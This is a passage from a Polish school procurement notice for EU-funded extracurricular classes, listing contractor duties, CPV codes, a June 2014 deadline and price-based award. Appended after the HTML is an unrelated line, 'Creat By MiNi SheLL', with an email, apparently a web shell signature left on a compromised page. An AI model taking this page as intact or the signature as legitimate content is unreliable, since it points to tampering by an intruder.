2. Opracowanie w terminie 7 dni kalendarzowych od dnia zawarcia umowy, programu i harmonogramu, a następnie przedstawienia do akceptacji Dyrektorowi Szkoły i koordynatorowi projektu. Program zajęć (dot. danej części przedmiotu zamówienia) powinien zawierać: - cel ogólny i cele szczegółowe zajęć, - formy realizacji, - sposoby realizacji celów, - oczekiwane efekty, - sposób ewaluacji efektów, - tematy kolejnych zajęć, - wykorzystanie pomocy dydaktycznych zakupionych w ramach projektu. Wzór harmonogramu będzie opracowany przez koordynatora projektu. b) Obowiązkiem Wykonawcy jest prowadzenie zajęć zgodnie z Rozporządzeniem Ministra Edukacji Narodowej i Sportu z dnia 18 kwietnia 2002 r. w sprawie organizacji roku szkolnego - Dz. U. z 2002 Nr 46, poz. 432 ze zm.). Uwagi dodatkowe: program dostosowany jest do potrzeb i poziomu  uczniów (zgodnie z przeprowadzoną diagnozą) nie przewyższający ich możliwości, uwzględniający aktualną wiedzę, czas zajęć musi być maksymalnie wykorzystany. 
3. Dokumentowanie na bieżąco zajęć pozalekcyjnych (karty czasu pracy, dzienniki zajęć, imienne listy obecności uczestników zajęć). 
4. Sporządzanie dwóch opinii o uczniach na podstawie analiz, diagnoz i innych narzędzi wykorzystywanych do pomiaru jakości i mierzenia rezultatów w celu oceny skuteczności prowadzonych (na początku i na końcu projektu)  
5. Przeprowadzenie testów sprawdzających poziom wiedzy uczestników/czek po zrealizowaniu 60% h zajęć.
6. Zastosowanie zasady równości płci w zależności od zdiagnozowanych potrzeb w odniesieniu do problematyki projektu i jego uczestników.

7. Informowanie na bieżąco o wszystkich zaistniałych problemach w realizacji projektu. 
8. Terminowe wypełnianie wszystkich wymaganych dokumentów projektu. 
9. Przestrzeganie obowiązków, zaleceń i terminów wynikających z realizacji umowy. 
10. Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo uczniów w czasie trwania zajęć, jakość i terminowość prowadzonych zajęć oraz szkody wyrządzone przez swoje działania lub zaniechania podczas wykonywania przedmiotu umowy. 
11. Dbałość o stan nieodpłatnie udostępnionych przez Dyrektora Szkoły pracowni/sali, sprzętu i urządzeń wykorzystywanych w trakcie realizacji projektu. 
12. Współdziałanie z Dyrektorem Szkoły, w której odbywają się zajęcia w zakresie spraw mających wpływ na rytm pracy szkoły w związku z prowadzonymi zajęciami. Wykonawca będzie zobowiązany bezwzględnie dostosować się do ustalonego przez dyrektora szkoły planu zajęć. Dotyczy to również organizacji spotkań w ramach zajęć, a także organizowanych imprez. 
13. Przestrzeganie przepisów ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. z 2002 r. nr 101 poz. 926 ze zm.) oraz Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 29 kwietnia 2004 r. w sprawie dokumentacji przetwarzania danych osobowych oraz warunków technicznych i organizacyjnych jakim powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych (Dz. U. z 2004 r. Nr 100, poz. 1024). 
14. Wspomaganie promocji i ewaluacji Projektów - informowanie o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego. 
15. Przestrzeganie wytycznych dotyczących oznaczenia Projektu w ramach POKL. 
16. Realizacja indywidualnych programów zajęć ukierunkowanych na realizację celów Projektu. 
Wynagrodzenie będzie wynagrodzeniem współfinansowanym ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego. Zamawiający informuje, iż wynagrodzenie będzie wypłacane za rzeczywiste godziny pracy osób prowadzących zajęcia w trakcie roku szkolnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5, 80.41.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com